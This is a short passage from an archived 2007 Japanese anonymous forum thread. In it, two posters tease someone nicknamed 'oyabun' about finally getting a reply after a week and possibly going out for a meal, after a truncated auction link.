ttp://page7.auctions.yahoo.co.jp/jp/auction/g49827946
…。

353 :ユー&名無しネ:2007/02/23(金) 19:57:35 ID:2qd0Dhu/
親分爺に構ってもらえて良かったな(w

354 :ユー&名無しネ:2007/02/23(金) 20:00:36 ID:I0aDn5jU
一週間越しの返信ktkr
食事に行けるといいな親分(w

51 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)